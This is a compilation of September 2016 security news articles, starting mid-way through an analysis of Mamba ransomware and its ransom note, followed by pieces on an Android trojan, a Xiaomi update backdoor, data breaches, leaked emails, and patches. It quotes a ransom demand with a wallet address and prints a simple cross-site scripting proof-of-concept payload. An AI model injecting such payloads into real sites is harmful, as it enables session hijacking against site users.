send 1BTC Per HOST to My Bitcoin Wallet , then we give you Decryption key For Your Server HDD!!

My Bitcoin Wallet Address : 1NLnMNMPbxWeMJVtGuobnzWU3WozYz86Bf

We Only Accept Bitcoin , it’s So easy!

you can use Brokers to exchange your money to BTC ASAP

it’s Fast way!



if You Don’t Have a Account in Bitcoin , Read it First :


bitcoin Market :





One point that caught our attention was the mention to “server” in the message reply. Would their strategy be to compromise just servers? Corroborates to that hypothesis the fact that the other machines with the “152.exe” file weren’t compromised.

The bitcoin wallet given by the cybercriminal received 4 BTC by the time of this writing.


Figure 8: Cybercriminal bitcoin wallet balance

As Renato Marinho has stated, Morphus Labs is open to collaborate with the information security community finding more information about this threat. They have other samples of Mamba.

Rooting Pokémons in Google Play Store
16.9.2016 Kaspersky Android
A few days ago we reported to Google the existence of a new malicious app in the Google Play Store. The Trojan presented itself as the “Guide for Pokémon Go”. According to the Google Play Store it has been downloaded more than 500,000 times. Our data suggests there have been at least 6,000 successful infections, including in Russia, India and Indonesia. However, since the app is oriented towards English-speaking users, people in such geographies, and more, are also likely to have been hit.

Analysis reveals that the app contains a malicious piece of code that downloads rooting malware – malware capable of gaining access to the core Android operating system, in this case for the purposes of unsolicited app install and adware.

Kaspersky Lab products detect the Trojan as HEUR:Trojan.AndroidOS.Ztorg.ad.

Rooting Pokémons in Google Play Store

Rooting Pokémons in Google Play Store

At least one other version of this particular app was available through Google Play in July 2016. Further, we have tracked back at least nine other apps infected with this Trojan and available on Google Play Store at different times since December 2015.

Trojan characteristics

The Trojan has many layers of defense in place to help it bypass detection. This includes a commercial packer that decrypts the original executable file to make it harder to analyze. The unpacked executable file contains useful code related to the malicious Pokémon Go guide, and one small and obfuscated module.

Rooting Pokémons in Google Play Store

Process of infection

This small module doesn’t start when the user launches the app. Instead, it waits for the user to install or uninstall another app, then checks to see if that app runs on a real device or on a virtual machine. If it turns out that it’s dealing with a device, the Trojan will wait for a further two hours before starting its malicious activity.

The first thing it does is connect to its command-and-control (CnC) server and upload data about the device, including country, language, device model and OS version.

If the server wants the Trojan to continue it will respond with an ID string. Only if the Trojan receives this ID string will it make its next request to the CnC. If it doesn’t receive anything, it will wait for two hours and then resubmit the first request. This feature is included so that the control server can stop the attack from proceeding if it wants to – skipping those users it does not wish to target, or those which it suspects are a sandbox/virtual machine, for example. Among other things, this provides an additional layer of protection for the malware.

Upon receiving the second request, the CnC server will send the Trojan a JSON file containing a URL. The Trojan downloads file from the specified URL, decrypts it and executes. In our case the Trojan downloaded a file detected as HEUR:Trojan.AndroidOS.Ztorg.a. This file is obfuscated too.

After execution, the Trojan will drop and download some more files. All downloaded files are encrypted and most of them are local root exploit packs for vulnerabilities dating from 2012 to 2015, including one that was previously used by Hacking Team.

These other files represent additional modules of the Trojan and are detected by Kaspersky Lab as:

HEUR:Backdoor.AndroidOS.Ztorg.c, HEUR:Trojan.AndroidOS.Muetan.b, HEUR:Trojan.AndroidOS.Ztorg.ad, HEUR:Backdoor.AndroidOS.Ztorg.h, HEUR:Backdoor.AndroidOS.Ztorg.j, HEUR:Trojan-Dropper.AndroidOS.Agent.cv, HEUR:Trojan.AndroidOS.Hiddad.c. And a few clean tools like busybox and chattr.

Using these exploit packs the Trojan will gain root access rights to the device. After gaining root access, the Trojan will install its modules into the system folders, silently installing and uninstalling other apps and displaying unsolicited ads to the user.

Most of the other apps with this Trojan module available in Google Play had about 10,000 downloads (according to Google Play), but one – “Digital Clock” had more than 100,000 downloads.

MD5 of Malicious Files Mentioned in Article

Xiaomi Can Silently Install Any App On Your Android Phone Using A Backdoor
15.9.2016 thehackernews Vulnerebility
Do you own an Android Smartphone from Xiaomi, HTC, Samsung, or OnePlus?
If yes, then you must be aware that almost all smartphone manufacturers provide custom ROMs like CyanogenMod, Paranoid Android, MIUI and others with some pre-loaded themes and applications to increase the device's performance.
But do you have any idea about the pre-installed apps and services your manufacturer has installed on your device?, What are their purposes? And, Do they pose any threat to your security or privacy?
With the same curiosity to find answers to these questions, a Computer Science student and security enthusiast from Netherlands who own a Xiaomi Mi4 smartphone started an investigation to know the purpose of a mysterious pre-installed app, dubbed AnalyticsCore.apk, that runs 24x7 in the background and reappeared even if you delete it.
Xiaomi is one of the world's largest smartphone manufacturers, which has previously been criticized for spreading malware, shipping handsets with pre-loaded spyware/adware and forked version of Android OS, and secretly stealing users' data from the device without their permission.
Xiaomi Can Silently Install Any App On your Device
After asking about the purpose of AnalyticsCore app on company’s support forum and getting no response, Thijs Broenink reverse engineered the code and found that the app checks for a new update from the company's official server every 24 hours.
While making these requests, the app sends device identification information with it, including phone's IMEI, Model, MAC address, Nonce, Package name as well as signature.
If there is an updated app available on the server with the filename "Analytics.apk," it will automatically get downloaded and installed in the background without user interaction.
"I couldn't find any proof inside the Analytics app itself, so I am guessing that a higher privileged Xiaomi app runs the installation in the background," Broenink says in his blog post.
Now the question is, Does your phone verify the correctness of the APK, and does it make sure that it is actually an Analytics app?
Broenink found that there is no validation at all to check which APK is getting installed to user's phone, which means there is a way for hackers to exploit this loophole.
This also means Xiaomi can remotely and silently install any application on your device just by renaming it to "Analytics.apk" and hosting it on the server.
"So it looks like Xiaomi can replace any (signed?) package they want silently on your device within 24 hours. And I’m not sure when this App Installer gets called, but I wonder if it’s possible to place your own Analytics.apk inside the correct dir, and wait for it to get installed," Broenink said.
Hackers Can Also Exploit This Backdoor
Since the researcher didn't find the actual purpose of the AnalyticsCore app, neither on Googling nor on the company's website, it is hard to say why Xiaomi has kept this mysterious "backdoor" on its millions of devices.
As I previously said: There is no such backdoor that only its creator can access.
So, what if hackers or any intelligence agency figure out how to exploit this backdoor to silently push malware onto millions of Xiaomi devices within just 24 hours?
Ironically, the device connects and receive updates over HTTP connection, exposing the whole process to Man-in-the-Middle attacks.
"This sounds like a vulnerability to me anyhow, since they have your IMEI and Device Model, they can install any APK for your device specifically," Broenink said.
Even on the Xiaomi discussion forum, multiple users have shown their concerns about the existence of this mysterious APK and its purpose.
"Don't know what purpose does it serve. Even after deleting the file it reappears after some time," one user said.
Another said, "if I go to battery usage app, this app is always at the top. It is eating away at resources I believe."
How to Block Secret Installation? As a temporary workaround, Xiaomi users can block all connections to Xiaomi related domains using a firewall app.
No one from Xiaomi team has yet commented on its forum about the question raised by Broenink. We'll update the story as soon as we heard from the company.
Meanwhile, if you are a Xiaomi user and has experienced anything fishy on your device, hit the comments below and let us know.

FBI Director — You Should Cover Your Webcam With Tape
15.9.2016 thehackernews Security

Should you put a tape or a sticker over the lens of your laptop's webcam?
Yes, even Facebook CEO Mark Zuckerberg and FBI Director James Comey do that.
Covering your laptop's webcam might be a hell cheap and good idea to guard against hackers and intruders who might want to watch your private life and environment through your devices.
In fact, Comey recently came out defending his own use of tape to cover his personal laptop's webcam.
People Are Responsible for Their Safety, Security & Privacy
During a conference at the Center for Strategic and International Studies, when Comey was asked that he still put tape over his cameras at home, he replied:
"Heck yeah, heck yeah. And also, I get mocked for a lot of things, and I am much mocked for that, but I hope people lock their cars… lock your doors at night. I have an alarm system. If you have an alarm system you should use it, I use mine."
Comey went on to explain that it was common practice at the FBI and other government offices to cover computers and laptops' webcams with tape or any physical cover.
"It’s not crazy that the FBI Director cares about personal security as well," he continued. "If you go into any government office, we all have our little camera things that sit on top of the screen, they all have a little lid that closes down on them, you do that, so people who do not have authority don’t look at you, I think that’s a good thing."
Comey believes that putting a cover over webcams is one of the "sensible things" that everyone should be doing to "take responsibility for their own safety and security."
While this practice is often made fun of, tapping your device's webcams is a good take away for you to adopt. We know the FBI and NSA's ability to spread malware and turn on device's webcam to spy on targets.
Edward Snowden Leaks revealed the NSA's Optic Nerve operation that was carried out to capture webcam images every 5 minutes from random Yahoo users, and in just six months, images of 1.8 Million users' were captured and stored on the government servers in 2008.
Internet of Things: Security Nightmare
However, putting a tape over the lens of your computer's webcam would not solve the problem, especially in this era when we are surrounded by so many Internet-connected devices that are a security nightmare.
Due to the insecure implementation, these Internet-connected or Internet of Things (IoTs) devices, including Security Cameras, are so vulnerable that hackers are routinely hijacking them and using them as weapons in cyber attacks.
So, it is far more easy for hackers to hack your security cameras, instead of your laptop's webcam, to keep track on you and your environment.
Do you feel the need to use a tape over your webcam? Let us know down in the comments.

ClixSense Data Breach, 6.6 Million users’ records stolen
15.9.2016 securityaffairs Crime

Hackers have breached the database of the advertising company ClixSense and stolen the details of 6.6 million users.
Here we are again to discuss a new data breach that exposed million user records of the advertising ClixSense service. ClixSense allows its clients to earn money online by paying surveys, free offers and paid per click advertising.

The popular security expert Troy Hunt who operates the breach notification service HaveIBeenPwned reported the ClixSense data breach that compromised at least 6.6 million user records, 2.4 million of which are already public.

The stolen data includes names, usernames, email addresses, passwords stored in plain text, account balances, dates of birth, payment information and IP addresses.

“In September 2016, the paid-to-click site ClixSense suffered a data breach which exposed 2.4 million subscriber identities. The breached data was then posted online by the attackers who claimed it was a subset of a larger data breach totalling 6.6 million records. The leaked data was extensive and included names, physical, email and IP addresses, genders and birth dates, account balances and passwords stored as plain text.

Compromised data: Account balances, Dates of birth, Email addresses, Genders, IP addresses, Names, Passwords, Payment histories, Payment methods, Physical addresses, Usernames, Website activity” wrote Hunt.


The company has confirmed the incident and reported a successful cyber attack that allowed hackers to gain access to its database server. It seems that attackers reached the database server with a lateral movement from an old server that had still been connected to it.

“It has come to our attention that this hacker did get access to our database server for a short period of time. He was able to gain access to this not directly but instead through an old server we were no longer using that had a connection to our database server. (This server has since been terminated).” reads the advisory published by the company. reads the official statement issued by the company.

“He was able to copy most if not all of our users table, he ran some SQL code that changed the names on accounts to “hacked account” and deleted many forum posts. He also set user balances to $0.00.”

The hackers were able to alter data in the archive, including account names and user balance that was set to zero, anyway the company informed to have restored the balance.

“We were able to restore the user balances, forum and many account names. Some of you were asked to fill out your name again as we did not want to restore this from our backup due to the amount of time it would have taken to get back online,” reads the statement.

In response to the incident, ClixSense has shut down the breached server, it has partially restored the backup, passwords have been reset and users have been advised to change their passwords.

The hackers published a post on Pastebin to announce the data breach and confirmed he had access to 6,606,008 user records in the database and the complete source code for the ClixSense website. According to the hackers, they released online a data sample after the ClixSense company initially denied being breached.

Let me close with a list of the most recent data breach, that flooded the criminal underground with hundred million credentials:

Myspace (360 million)
LinkedIn (167 million)
Rambler (100 million)
VK (100 million)
Tumblr (65 million)
VerticalScope (45 million)
Last.fm (43 million)
QIP (33 million affected)

Colin Powell’s emails leaked online. He calls Trump ‘National Disgrace’
15.9.2016 securityaffairs Hacking

A new batch of Colin Powell’s emails was leaked online by Russian hackers. Powel criticized both Presidential candidates, Trump and Clinton.
Powell’s emails sent in a couple of years have been published on the website DC Leaks in a section protected by a password that was available only to select news outlets. The Powell’s e-mails belong to a new batch not included in the Powell dump leaked a few years ago.

The emails report Powell’s correspondence with his strict collaborators, his team at a speakers bureau and journalists over a period of 26 months.

The emails, that span from June 2014 to the last month, includes the severe Powell’s comments on presidential candidates, Donald Trump and Hillary Clinton.

The data leakage was attributed to a group of Russian state-sponsored hackers, known as APT28 or Fancy Bear. The group is the same that recently leaked US athletics’ medical records stolen from the World Anti-Doping Agency.

According to an investigation conducted by researchers at security firm ThreatConnect, the hackers are linked to the Kremlin.


Powell told the The New York Times that the leaked messages are authentic.

“An aide to Mr. Powell confirmed the hack and said, “They are his emails.”.”

Powell was highly critical of many politicians, in one of the hacked email, he calls Trump ‘National Disgrace and an international pariah.’

A message, dated June 23, 2016, was sent by Colin Powell to former Secretary of State Condoleezza Rice reads:

“if Donald were to somehow win, by the end of the first week in office he’d be saying ‘What the hell did I get myself into?'”

Colin Powell also criticized the Hilary Clinton’s campaign and the way she managed the theft of her emails.

“I would rather not have to vote for her, although she is a friend I respect,” Powell wrote. “A 70-year person with a long track record, unbridled ambition, greedy, not transformational, with a husband still d—ing bimbos at home (according to the NYP).”

The Clinton campaign’s “email ploy this week didn’t work and she once again looks shifty if not a liar,” Powell wrote on August 20 to someone he worked with at the White House. “Trump folks having fun with her.”

In a separate leaked email exchange reported by NBC News, Powell also criticized aides to Hillary Clinton for their attempts to involve him in the case of the theft of her email due the use of a private email server when she served as Secretary of State.

In other emails reported by BuzzFeed News, Colin Powell accuses Trump of having embraced a “racist” movement when he publicly questioned the validity of President Obama’s birth certificate.

“Yup, the whole birther movement was racist,” Mr. Powell wrote in an email to a former aide, according to BuzzFeed. “That’s what the 99% believe. When Trump couldn’t keep that up he said he also wanted to see if the certificate noted that he was a Muslim. As I have said before, ‘What if he was?’ Muslims are born as Americans everyday.” Reported the NYT.

It’s still not clear how the hackers have compromised the Powell’s Gmail account in order to steal the messages.

Some experts argued that Powell’s Gmail account was hacked because he shared the same login credentials with a web service that was compromised in the past. Colin Powell’s Gmail credentials were also used to access DropBox and this data are contained in Dropbox dump recently leaked online.

Colin Powell’s emails have been leaked a few months after the mysterious hacker Guccifer 2.0 hacked the Democratic National Committee. Powell’s e-mails were published on a password-protected portion of DC Leaks that was available only to select news outlets. So far, there have been no definitive reports on precisely how the messages were obtained by DC Leaks.

How to hack Google FR by exploiting a cross-site scripting flaw
15.9.2016 securityaffairs Android

The security expert Issam Rabhi (@issam_rabhi) has discovered a cross-site scripting vulnerability in Google France. The giant already fixed it.
A security expert from French security outfit Sysdream, Issam Rabhi (@issam_rabhi), discovered a cross-site scripting vulnerability in Google France. Yes, you‘ve got it right, the website of the IT giant was affected by one of the most common vulnerabilities. According to the OWASP Top Ten, the cross-site scripting is the third most popular issue affecting web applications.

cross-site scripting Google FR

Such kind of flaw could be exploited by a malicious attacker for various attacks, including defacements and traffic hijacking.

“XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.” reads the description provided by the OWASP TOP 10.

The experts reported the cross-site scripting vulnerability to Google on August 5th and the experts of the company fixed the vulnerability in just four days.

Rabhi published a Proof-of-concept for the attack on his website, below the exploitation step by step:

First we need to click the link below using Firefox browser:
Then, to insert the following payload in the input field related to search:
<svg onload=alert(document.domain)>
Finally, the alert message box will pop up on the screen.

The expert did not submit the bug under the Google bug bounty program, anyway he received kudos from his colleagues.

The Project Zero Contest — Google will Pay you $200,000 to Hack Android OS
14.9.2016 securityaffairs Hacking
The Project Zero Contest — Google will Pay you $200,000 to Hack Android OS
Why waiting for researchers and bug hunters to know vulnerabilities in your products, when you can just throw a contest for that.
Google has launched its own Android hacking contest with the first prize winner receiving $200,000 in cash.
That's a Hefty Sum!
The contest is a way to find and destroy dangerous Android vulnerabilities before hackers exploit them in the wild.
The competition, dubbed 'The Project Zero Prize,' is being run by Google’s Project Zero, a team of security researchers dedicated to documenting critical bugs and making the web a safer place for everyone.
What's the Requirements?
Starting Tuesday and ending on March 14, 2017, the contest will only award cash prizes to contestants who can successfully hack any version of Android Nougat on Nexus 5X and 6P devices.
However, the catch here is that Google wants you to hack the devices knowing only the devices' phone numbers and email addresses.
For working of their exploits, contestants are allowed to trick a user into open an email in Gmail or an SMS text message in Messenger, but no other user interaction beyond this is allowed.
So, if you want to participate in 'The Project Zero Prize' contest, you are advised to focus on flaws or bug chains that would allow you to perform Remote Code Execution (RCE) on multiple Android devices.
"Despite the existence of vulnerability rewards programs at Google and other companies, many unique, high-quality security bugs have been discovered as a result of hacking contests," Project Zero security researcher Natalie Silvanovich said in a blog post while announcing the competition.
Therefore, the company has taken this initiative to run its own hacking contest in search of severe Android security vulnerabilities.
Contest Cash Prizes
First Prize: worth $200,000 USD will be awarded to the first winning entry.
Second Prize: worth $100,000 USD will be awarded to the second winning entry.
Third Prize: At least $50,000 USD will be awarded to additional winning entries.
Besides cash prizes, winners will also be invited to write a short technical report describing their entry, which will then be posted on the Project Zero Blog.
For more details about the contest, you can check out the
Project Zero Security Contest Official Rules.

Microsoft and Adobe Rolls Out Critical Security Updates - Patch Now!
14.9.2016 securityaffairs Vulnerebility

You should not miss this month’s Patch Updates, as it brings fixes for critical issues in Adobe Flash Player, iOS, Xcode, the Apple Watch, Windows, Internet Explorer, and the Edge browser.
Adobe has rolled out a critical update to address several issues, most of which are Remote Code Execution flaws, in its widely-used Adobe Flash Player for Windows, Macintosh, Linux and ChromeOS. Whereas, Microsoft has released 14 security updates to fix a total of 50 vulnerabilities in Windows and related software.
First of all, if you have Adobe Flash Player installed and have not yet updated your software plugin, you are playing with fire.
Critical Flash Vulnerabilities Affect Windows, Mac, Linux and ChromeOS
Adobe has released its latest round of security patches to address critical vulnerabilities in Adobe Flash Player for Windows, Mac OS X, Linux and ChromeOS.
The Flash vulnerabilities could potentially allow an attacker to take control of the vulnerable system. So, users are strongly advised to update to Flash Player version before hackers have their hands on it.
However, the best advice I can give you is to ditch this insecure, buggy software once and for all and significantly improve the security of your system in the process.
Even PornHub said Good Bye to Flash Player, so it's no longer an excuse for you to keep Flash on your PC ;)
Meanwhile, Microsoft has released its September 2016 Patch Update that includes 14 bulletins, seven of which earned its most dire "critical" rating and seven are rated as "important," addressing a total of 50 vulnerabilities.
Critical Zero-Day Exploit in the Wild
The most critical vulnerability addressed by Microsoft in the MS16-104 and MS16-105 update is a zero-day vulnerability in Internet Explorer (IE) and Edge.
Dubbed Microsoft Browser Information Disclosure Vulnerability (CVE-2016-3351), the zero-day flaw could allow an attacker to perform remote code execution attacks by tricking a victim to view a specially crafted webpage using Internet Explorer or Edge.
If exploited successfully, the attacker would gain the same user rights as the current user and could take control of an affected system, if the victim is logged on with administrative user rights, potentially allowing the attacker to install malware, modify or delete data, or even create new accounts with full user rights.
This informational disclosure bug was first reported by Proofpoint researchers with the help of Trend Micro in 2015, when they uncovered a massive malvertising campaign, dubbed AdGholas, actively exploiting the CVE-2016-3351 flaw.
The researchers also found another hacking group named GooNky actively exploiting the flaw. For in-depth details about the flaw, you can head on to Proofpoint's blog post.
Another critical bulletin MS16-108 affecting organizations using Exchange Server for their email platform addresses a file format parsing flaw that could be exploited by attackers using remote-code execution to get full control of the Exchange Server. This flaw affects all supported versions of Exchange Server.
To exploit the flaw, all an attacker needs is to send a malicious file to anyone in the organization and Boom! Exchange Server pre-parses to find out the file type, which would get the malicious exploit triggered before users even get the file.
Other Critical and Important flaws in Windows and its Software
Other critical Bulletins include MS16-106 that fixes five holes in the Windows Graphics Device Interface; MS16-107 that contains patches for Microsoft Office and SharePoint to address a total of 13 vulnerabilities; MS16-116 that fixes a RCE flaw in Microsoft OLE Automation mechanism and the VBScript Scripting Engine; and MS16-117 that includes critical fixes for Adobe Flash libraries contained in Internet Explorer 10 and 11 and Microsoft Edge.
Note: The MS16-11 fix requires users to first apply the Internet Explorer update (MS16-104) in order to be effective.
Important Bulletins include fixes for RCE flaws in Windows, SMBv1 Server and Silverlight; elevation of privilege flaws in the Windows Kernel and Windows Lock Screen; an information disclosure bug in the Windows Secure Kernel Mode; and a pair of information disclosure vulnerabilities in Windows PDF Library.
Users are advised to apply Windows as well as Adobe patches to keep away hackers and cybercriminals from taking control over your computer.
Microsoft Ends Tuesday Patches Trend
The September Patch Update was the last traditional Windows Patch Tuesday as the tech giant is moving to a new patching release model.
The future patch updates will bundle all patches together, and you will no longer be able to select which updates to install. The whole package of patches will be installed altogether, which will leave no chance for hackers to target vulnerabilities for which patches are already released.
In addition, the new "Monthly Rollup" will be combined and delivered to the users. Like the November patch update will also include all the patches from October.

Apply the security updates issued by Adobe and Microsoft asap
14.9.2016 securityaffairs Vulnerebility

Are you still using Adobe Flash Player? Are you browsing the web with IE or Edge? Does your company use an Exchange Server? Apply security updates asap!
It’s time to patch your systems, especially if you have installed Adobe Flash Player. Adobe has released Security updates to fix critical Flash vulnerabilities that affect any OS (Windows, Mac, Linux), including ChromeOS.

The security vulnerabilities in flash could be exploited by attackers to gain the control over the vulnerable system as explained by Adobe in an executive summary:

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and ChromeOS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. ” reads the security advisory issued by Adobe.

Users are urged to update their Flash Player to the version

security updates

Not only Adobe users are under the fire, Microsoft has released the September 2016 Patch Update that includes 14 bulletins addressing a total of 50 vulnerabilities. Seven vulnerabilities addressed in the last patch update have been rated as “critical,” other seven as “important.”

One of the vulnerabilities fixed by the update is a zero-day flaw (CVE-2016-3351) in the Internet Explorer (IE) and Edge, tracked as MS16-104 and MS16-105.

The CVE-2016-3351, so-called Microsoft Browser Information Disclosure Vulnerability, could be exploited by an attacker to remotely execute code by tricking a victim to visit a specially crafted webpage using Internet Explorer or Edge.

Once the victims visit the webpage, the attacker would gain the same user rights as the current user and could take control of the vulnerable system.

The vulnerability was first spotted by security experts at Proofpoint that worked with researchers from Trend Micro.

“Proofpoint researchers recently uncovered a massive malvertising campaign with colleagues at Trend Micro [2]. The actors, dubbed AdGholas, were notable for their use of steganography and careful targeting of the malicious ads for massive volumes of high-quality impressions – impressions that went to 1-5 million “average users” a day and specifically avoided researchers. Avoiding researchers and their virtual machines and sandboxes relied on exploiting an information disclosure zero-day in Microsoft Internet Explorer/Edge, among other techniques.” reads the analysis published by Proofpoint.

The exploitation of the zero-day was first reported by TrendMicro that uncovered a massive malvertising campaign, dubbed AdGholas, actively exploiting it. The same vulnerability was also exploited by another threat actor in the wild, a hacking crew known as GooNky.

“On September 13, 2016 Microsoft released a security bulletin [1] fixing the CVE-2016-3351 vulnerability, which included a patch for Internet Explorer and Edge browsers. This informational disclosure bug was first reported in 2015. During our work with Trend Micro on the AdGholas [2] campaign, we reported it again and it was assigned a CVE ID and patch. Briefly, this vulnerability is a MIME type check used to filter out systems that have certain shell extension associations, including .py, .pcap, and .saz. In some cases, certain extensions association including .doc, .mkv., .torrent, and .skype are required to trigger the next exploitation step.”

The Microsoft update also addresses another critical flaw in all the supported versions of the Exchange Server (MS16-108) widely adopted by organizations. In this case, attackers could exploit the bug using remote-code execution to get full control of the Exchange Server.

The attack scenario is simple, the attackers just need to send a malicious file to its victims, the vulnerability is automatically triggered when the Exchange Server pre-parses file to find out the file type.

As anticipated the Microsoft update addresses many other flaws, give a look at it.

Let me close with an information regarding the traditional Microsoft monthly update, this is the last Windows Patch Tuesday.

The future patch updates will bundle all patches together, this means that users will have to install the whole package of patches altogether.

Don’t waste time, patch your system asap.

Periscope Skimming, a new ATM threat spotted in the US
14.9.2016 securityaffairs Hacking

Secret Service warns of Periscope Skimming probes, it the first time that law enforcement discovered attacks against ATMs conducted with these devices.
The US Secret Service is warning banks and ATM vendors about a new ATM skimmer technology, the so-called ‘periscope skimming.’ The device is composed of a skimming probe that crooks connect to the ATM’s internal circuit board in order to steal card data.

The popular cyber security expert Brian Krebs published the images of the periscope skimming, the photos show the wires protruding from the periscope.

Periscope Skimming

As explained by Krebs this is the first time that the periscope skimming is spotted by law enforcement in the US. The police have already discovered two installations of the periscope skimming in the country, the first one on August 19 in Greenwich, Connecticut, the second one on September 3 in Pennsylvania
“According to a non-public alert released to bank industry sources by a financial crimes task force in Connecticut, this is thought to be the first time periscope skimming devices have been detected in the United States.” wrote Brian Krebs in a blog post.

The new periscope skimming is able to store up to 32,000 payment card numbers, once installed on the ATM, it has a power autonomy up to 14 days.

In both installations case analyzed by the law enforcement, the cyber criminals had access to the insides of the cash machines (referred to as “top-hat” entry) by using a key, then they installed two devices connecting them by wiring.

One of the devices is the periscope skimming probe that is installed through a pre-existing hole on the frame of the motorized card reader. The probe connects the pad to the circuit board.

The second device is the so-called “skimming control device,” it is directly connected to the skimming probe and is composed of the battery source and data storage unit.

“The probe is set in place to connect to the circuit board and directly onto the pad that transfers cardholder data stored on the magnetic stripe on the backs of customer payment cards. The probe is then held in place with fast-drying superglue to the card reader frame.” wrote Krebs.

“According to the Secret Service, the only visible part of this skimming device once the top-hat is opened will be the wire extending from the periscope probe that leads to the second part of this skimmer — called a “skimming control device.” “

Periscope Skimming

Authorities believe the samples of periscope skimming probes recently discovered are just prototypes, in fact, they lack hidden cameras or other methods of capturing bank customer’s PINs at the ATMs.

Krebs sustains that the incidence of such skimming scams will not decrease as more banks begin adopting chip-based payment cards. Most banks and financial institutions will continue to rely on the magnetic stripe to use the new generation of cards. It is likely that banks will continue to use the magnetic stripe at the ATM to check the correct insertion of the card in the slot of the cash machine.

“The principal reason for this is to ensure that customers are putting the card into the slot correctly, as embossed letters and numbers running across odd spots in the card reader can take their toll on the machines over time. As long as the cardholder’s data remains stored on a chip card’s magnetic stripe, thieves will continue building and placing these types of skimmers.” explained Krebs.

How to avoid such kind of attacks?

Users have to avoid using ATMs that may be easier to access from the top-hat, try to use cash machine installed in the wall at a bank and do not use ATMs located in not protected places.

Sports doping agency WADA confirms attack by Russian cyber spies
14.9.2016 securityaffairs BigBrothers

World Anti-Doping Agency (WADA) confirms that Russian hackers breached its Anti-Doping Administration and Management System (ADAMS) database.
Hackers breached the World Anti-Doping Agency (WADA) and have stolen Olympic athletes’ medical records, the hack was confirmed by the agency. According to the WADA, the hackers accessed the Anti-Doping Administration and Management System (ADAMS) database, security experts speculate the involvement of the “Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear.”

The hackers obtained the access to the system by stealing credentials through a spear phishing attack against an “International Olympic Committee (IOC)-created account for the Rio 2016 Games.”

Hackers exploited the attention on the Olympic Games in order to trick the victims with a classic social engineering attack.

“The World Anti-Doping Agency (WADA) confirms that a Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear, illegally gained access to WADA’s Anti-Doping Administration and Management System (ADAMS) database via an International Olympic Committee (IOC)-created account for the Rio 2016 Games. The group accessed athlete data, including confidential medical data — such as Therapeutic Use Exemptions delivered by International Sports Federations (IFs) and National Anti-Doping Organizations (NADOs) — related to the Rio Games; and, subsequently released some of the data in the public domain, accompanied by the threat that they will release more.” reads the statement issued by the WADA that regrets the cyber attack.

WADA ✔ @wada_ama
WADA Confirms Attack by Russian Cyber Espionage Group: http://ow.ly/gYik304aJxX
17:47 - 13 Set 2016 · Canada, Canada
265 265 Retweet 80 80 Mi piace
The hackers have released files claiming that top US athletes were authorized by the WADA to take performance-enhancing substances, the WADA agency, the atletes and the federations have denied the circumstance.

sports federations and athletes themselves have gone public to deny any wrongdoing.
The Fancy Bear published the announcement of the data breach and the related file on a website using their name. (Be careful before visiting the site, Fancy Bear is one of the most dangerous APT that in several attacks leveraged on zero-day exploits). Below the message published by the group on the site that also included medical records of the athlete.

“Greetings citizens of the world. Allow us to introduce ourselves… We are Fancy Bears’ international hack team. We stand for fair play and clean sport.

We announce the start of #OpOlympics. We are going to tell you how Olympic medals are won. We hacked World Anti-Doping Agency databases and we were shocked with what we saw.”

“We will start with the U.S. team which has disgraced its name by tainted victories. We will also disclose exclusive information about other national Olympic teams later. Wait for sensational proof of famous athletes taking doping substances any time soon.”

Serena Williams, for example, was allowed to take oxycodone, hydromorphone, prednisone and methylprednisolone in 2010, 2014 and 2015, despite the substances are banned by the WADA.

According to RT.com, Williams was allowed also to take some of other drugs by Dr. Stuart Miller from the International Tennis Federation (ITF).


The WADA director general Olivier Niggli confirmed the involvement of Russian hackers in the statement issued by the agency.

“WADA condemns these ongoing cyber-attacks that are being carried out in an attempt to undermine WADA and the global anti-doping system,” said Niggli. “WADA has been informed by law enforcement authorities that these attacks are originating out of Russia,” he continued. “Let it be known that these criminal acts are greatly compromising the effort by the global anti-doping community to re-establish trust in Russia further to the outcomes of the Agency’s independent McLaren Investigation Report,” Niggli continued.

According to the experts, the hackers hit the WADA agency in response to accusations of government-sponsored doping for Russian athletics, some of them were even banned from the Olympic Games this summer.

Stay Tuned …

324,000 Financial Records leaked online, who is the victim?
14.9.2016 securityaffairs Crime

A hacker leaked a data dump containing more than 320,000 Financial Records apparently stolen from an Israeli payment processor.
Another data breach is in the headline, roughly 324,000 financial records have been leaked online.

The financial data appears to have been stolen either from payment processor BlueSnap or its customer Regpack, a hacker published a link to the archive (a file Titled named “Bluesnap_324K_Payments.txt”) on his Twitter account @0x2Taylor.

 Financial Records bluesnap-data-archive

The hacker who published the link to the stolen data, claimed it belongs to the BlueSnap company. BlueSnap is an e-commerce solutions provider that specializes in global payment processing, it allows customers’ websites to accept payments from their clients by offering merchant facilities.

BlueSnap was founded in Israel back in 2001, its name was originally Plimus, it was rebranded as BlueSnap when it was acquired in 2011.

Regpack is a company that provides online event registration solutions, it has been using BlueSnap’s payment platform since 2013.

The records include names, email addresses, IP addresses, physical addresses, phone numbers, invoices, the last four digits of credit card numbers, and even CVV codes.

 Financial Records alleged-bluesnap-payment-record

Be careful, even if full card data has was not disclosed, the leaked CVVs and other info can be used by crooks to conduct card-not-present transactions.

At the time I was writing, both BlueSnap and Regpack denied having been a victim of a data breach.

The news was shared by the popular cyber security expert Troy Hunt, who has analyzed the leaked records verifying their genuinity.

Hunt highlighted the presence of invoices related to Jewish company, another circumstance that suggests the involvement of one of the mentioned companies.

“Now it’s possible that the data has come from another unnamed party, but it’s highly unlikely. Not only could I not pick a pattern in the data suggesting it was sourced from elsewhere, but the CVVs just shouldn’t have been there,” Hunt wrote in a blog post. “We’ve got 899 totally separate consumers of the Regpack service (so it’s not from one of them) who send their data direct to Regpack who pass payment data onto BlueSnap for processing. Unless I’m missing a fundamental piece of the workflow (and I’m certainly open to suggestions on what this might be), it looks like accountability almost certainly lies with one of these two parties.”

Hunt contacted both companies for a comment that denied any incident after forensic investigations.

If you want to check if your data are included in the dump , visit the breach notification service website managed by Hunt, the popular https://haveibeenpwned.com/.

How to Hack Smart Bluetooth Locks and IoT Devices — Check this Out
13.9.2016 thehackernews Hacking
Bluetooth Low Energy, also known as Bluetooth Smart or Bluetooth 4, is the leading protocol designed for connecting IoT devices, medical equipment, smart homes and like most emerging technologies, security is often an afterthought.
As devices become more and more embedded in our daily lives, vulnerabilities have real impact on our digital and physical security.
